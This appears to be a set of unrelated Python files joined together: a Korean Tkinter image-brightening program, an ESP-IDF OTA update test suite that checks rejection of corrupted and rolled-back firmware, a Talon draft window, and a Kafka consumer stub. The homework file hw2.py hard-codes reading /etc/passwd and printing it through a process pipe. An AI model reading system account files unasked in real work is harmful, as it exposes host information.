outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
def addImage() : # 밝게하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def addImage() : # 밝게하기 알고리즘
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
## 전역 변수부
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
VIEW_X, VIEW_Y = 128, 128 # 디스플레이 크기 고정
status=None
## 메인 코드부
window = Tk(); window.geometry('400x400');
window.title('영상 처리&데이터 분석')
status = Label(window, text="이미지 정보", bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
window.mainloop()
|
hw2.py
|
'''
2.使用多进程模型实现,父进程将命令行所跟的文件发送给子进程,子进程将收到的文件打印出来
python hw2.py “/etc/passwd”
'''
from multiprocessing import Pipe, Process
def job(inn,out):
inn.close()
while True:
try:
print(out.recv())
except:
out.close()
break
if __name__=='__main__':
in_pipe,out_pipe=Pipe()
p=Process(target=job,args=(in_pipe,out_pipe))
p.start()
out_pipe.close()
f=open("/etc/passwd","r")
for line in f.readlines():
in_pipe.send(line)
in_pipe.close()
p.join()
|
draftwindow.py
|
from tkinter import *
from tkinter import font
import threading
import socket
import time
class DraftWindow():
def __init__(self):
threading.Thread(target=self.spawn, daemon=False).start()
def spawn(self):
while True: # recreate the window when closed
self.gui = Tk()
self.gui.client(socket.gethostname())
self.gui.title("Talon Draft")
w = self.gui.winfo_screenwidth()
h = self.gui.winfo_screenheight()
f = font.nametofont("TkFixedFont").actual()
self.gui.geometry(f"{int(w*0.8)}x{int(h*0.7)}+{int(w*0.1)}+{int(h*0.15)}")
self.text = Text(self.gui, font=(f['family'], 40), height=1, width=1)
self.text.pack(side=TOP, fill=BOTH, expand=True)
# buffers for thread communication
self.content = ""
self.insertQueue = []
self.action = ""
self.text.tag_add("highlight", "1.0", "1.0")
self.text.tag_config("highlight", foreground="red")
self.text.bind("<Any-Motion>", self.on_mouse_move)
self.text.bind("<Button>", self.on_click)
self.text.bind("<<Modified>>", self.on_change)
self.onChangeSentinel = False
self.statusbar = Label(self.gui, text="status bar", bd=1, relief=SUNKEN, anchor=W)
self.statusbar.pack(side=BOTTOM, fill=X)
self.close()
self.poll()
self.gui.mainloop()
def poll(self):
if len(self.insertQueue) > 0:
self.text.insert(INSERT, self.insertQueue.pop(0))
if self.action == "show":
self.action = ""
self.gui.deiconify()
self.gui.lift()
self.gui.focus_force()
self.text.focus()
if self.action == "close":
self.action = ""
self.text.delete("1.0", "end")
self.gui.withdraw()
self.gui.after(10, self.poll)
def on_mouse_move(self, event):
self.text.tag_remove("highlight", "1.0", "end")
index = self.text.index("@%s,%s" % (event.x, event.y))
self.text.tag_add("highlight", index + " wordstart", index + " wordend")
def on_click(self, event):
index = self.text.index("highlight.first")
word = self.text.get("highlight.first", "highlight.last")
if word == '\n':
return
self.text.delete("highlight.first", "highlight.last")
if word[0] == word[0].lower():
self.text.insert(index, word[0].upper() + word[1:])
else:
self.text.insert(index, word[0].lower() + word[1:])
def on_change(self, event):
if self.onChangeSentinel:
self.onChangeSentinel = False
return
self.content = self.text.get("1.0", "end-1c")
self.statusbar['text'] = self.content.replace('\n', '\\n')
self.onChangeSentinel = True
self.text.tk.call(self.text._w, 'edit', 'modified', 0)
def insert(self, string):
self.insertQueue.append(string)
def get_content(self):
return self.content
def show(self):
self.action = "show"
def close(self):
self.action = "close"
from talon import Module
#from .draftwindow import DraftWindow
mod = Module()
window = DraftWindow()
@mod.action_class
class Actions:
def show_draft_window():
"""shows draft window"""
window.show()
def close_draft_window():
"""closes draft window"""
window.close()
|
example_test.py
|
import http.server
import multiprocessing
import os
import random
import re
import socket
import ssl
import struct
import subprocess
import ttfw_idf
from RangeHTTPServer import RangeRequestHandler
from tiny_test_fw import DUT, Utility
server_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'test_certs/server_cert.pem')
key_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'test_certs/server_key.pem')
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def https_request_handler():
"""
Returns a request handler class that handles broken pipe exception
"""
class RequestHandler(RangeRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
RangeRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
os.chdir(ota_image_dir)
requestHandler = https_request_handler()
httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
os.chdir(ota_image_dir)
chunked_server = subprocess.Popen(['openssl', 's_server', '-WWW', '-key', key_file, '-cert', server_file, '-port', str(server_port)])
return chunked_server
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
print('Sending resp, URL: ' + url)
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RedirectHandler
def start_redirect_server(ota_image_dir, server_ip, server_port, redirection_port):
os.chdir(ota_image_dir)
redirectHandler = redirect_handler_factory('https://' + server_ip + ':' + str(redirection_port) + '/advanced_https_ota.bin')
httpd = http.server.HTTPServer((server_ip, server_port), redirectHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
Working of OTA if binary file is truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated.bin'
# Size of truncated file to be grnerated. This value can range from 288 bytes (Image header size) to size of original binary file
# truncated_bin_size is set to 64000 to reduce consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('Image validation failed, image is corrupted', timeout=30)
os.remove(binary_file)
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
Working of OTA if headers of binary file are truncated is vaildated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated_header.bin'
# Size of truncated file to be grnerated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('advanced_https_ota_example: esp_https_ota_read_img_desc failed', timeout=30)
os.remove(binary_file)
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
Working of OTA if random data is added in binary file are validated in this test case.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Random binary file to be generated
random_bin_name = 'random.bin'
# Size of random binary file. 32000 is choosen, to reduce the time required to run the test-case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, 'wb+')
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(struct.pack('B', 0))
for i in range(random_bin_size - 1):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + random_bin_name)
dut1.expect(re.compile(r'esp_https_ota: Mismatch chip id, expected 0, found \d'), timeout=10)
os.remove(binary_file)
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_chunked(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + bin_name))
dut1.write('https://' + host_ip + ':8070/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
chunked_server.kill()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_redirect_url(env, extra_data):
"""
This is a positive test case, which starts a server and a redirection server.
Redirection server redirects http_request to different port
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Port to which the request should be redirecetd
redirection_server_port = 8081
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
thread2 = multiprocessing.Process(target=start_redirect_server, args=(dut1.app.binary_path, host_ip, redirection_server_port, server_port))
thread2.daemon = True
thread2.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
thread2.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(redirection_server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
thread1.terminate()
thread2.terminate()
@ttfw_idf.idf_example_test(env_tag='Example_8Mflash_Ethernet')
def test_examples_protocol_advanced_https_ota_example_anti_rollback(env, extra_data):
"""
Working of OTA when anti_rollback is enabled and security version of new image is less than current one.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with lower security version
3. Fetch OTA image over HTTPS
4. Check working of anti_rollback feature
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='anti_rollback')
Utility.console_log('Erasing the flash on the chip')
# erase the flash
dut1.erase_flash()
server_port = 8001
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Modified firmware image to lower security version in its header. This is to enable negative test case
anti_rollback_bin_name = 'advanced_https_ota_lower_sec_version.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
file_size = os.path.getsize(binary_file)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, anti_rollback_bin_name), 'wb+')
fo.write(f.read(file_size))
# Change security_version to 0 for negative test case
fo.seek(36)
fo.write(b'\x00')
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, anti_rollback_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
# Positive Case
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use originally generated image with secure_version=1
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
dut1.expect('App is valid, rollback cancelled successfully', 30)
# Negative Case
dut1.expect('Starting Advanced OTA example', timeout=30)
# Use modified image with secure_version=0
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + anti_rollback_bin_name)
dut1.expect('New firmware security version is less than eFuse programmed, 0 < 1', timeout=30)
os.remove(binary_file)
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_partial_request(env, extra_data):
"""
This is a positive test case, to test OTA workflow with Range HTTP header.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='partial_download')
server_port = 8001
# Size of partial HTTP request
request_size = 16384
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
http_requests = int((bin_size / request_size) - 1)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
Utility.console_log('ENV_TEST_FAILURE: Cannot connect to AP')
raise
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
for _ in range(http_requests):
dut1.expect('Connection closed', timeout=60)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA', nightly_run=True)
def test_examples_protocol_advanced_https_ota_example_nimble_gatts(env, extra_data):
"""
Run an OTA image update while a BLE GATT Server is running in background. This GATT server will be using NimBLE Host stack.
steps: |
1. join AP
2. Run BLE advertise and then GATT server.
3. Fetch OTA image over HTTPS
4. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='nimble')
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.expect('GAP procedure initiated: advertise', timeout=30)
print('Started GAP advertising.')
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA', nightly_run=True)
def test_examples_protocol_advanced_https_ota_example_bluedroid_gatts(env, extra_data):
"""
Run an OTA image update while a BLE GATT Server is running in background. This GATT server will be using Bluedroid Host stack.
steps: |
1. join AP
2. Run BLE advertise and then GATT server.
3. Fetch OTA image over HTTPS
4. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='bluedroid')
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.expect('Started advertising.', timeout=30)
print('Started GAP advertising.')
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_openssl_aligned_bin(env, extra_data):
"""
This is a test case for esp_http_client_read with binary size multiple of 289 bytes
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Binary file aligned to DEFAULT_OTA_BUF_SIZE(289 bytes) boundary
aligned_bin_name = 'aligned.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
# Original binary size
bin_size = os.path.getsize(binary_file)
# Dummy data required to align binary size to 289 bytes boundary
dummy_data_size = 289 - (bin_size % 289)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, aligned_bin_name), 'wb+')
fo.write(f.read(bin_size))
for _ in range(dummy_data_size):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
f.close()
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + aligned_bin_name))
dut1.write('https://' + host_ip + ':8070/' + aligned_bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
chunked_server.kill()
os.remove(aligned_bin_name)
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_chunked()
test_examples_protocol_advanced_https_ota_example_redirect_url()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
test_examples_protocol_advanced_https_ota_example_anti_rollback()
test_examples_protocol_advanced_https_ota_example_partial_request()
test_examples_protocol_advanced_https_ota_example_nimble_gatts()
test_examples_protocol_advanced_https_ota_example_bluedroid_gatts()
test_examples_protocol_advanced_https_ota_example_openssl_aligned_bin()
|
async_consumer.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import time
import signal
import sys
import subprocess
import threading
import logging
from logging.config import fileConfig
from async_app.config import get_configs
from async_app.async.kafka import init_kafka_manager
from async_app.async.consumer import consume_dict
from async_app.store.manager import init_store_manager, get_store_manager
from async_app.task import do_async_task
from async_app.metrics.client import metrics_client
from async_app.async.kafka import get_kafka_manager
subprocess.call(["mkdir", "-p", "/logs/guldan"])
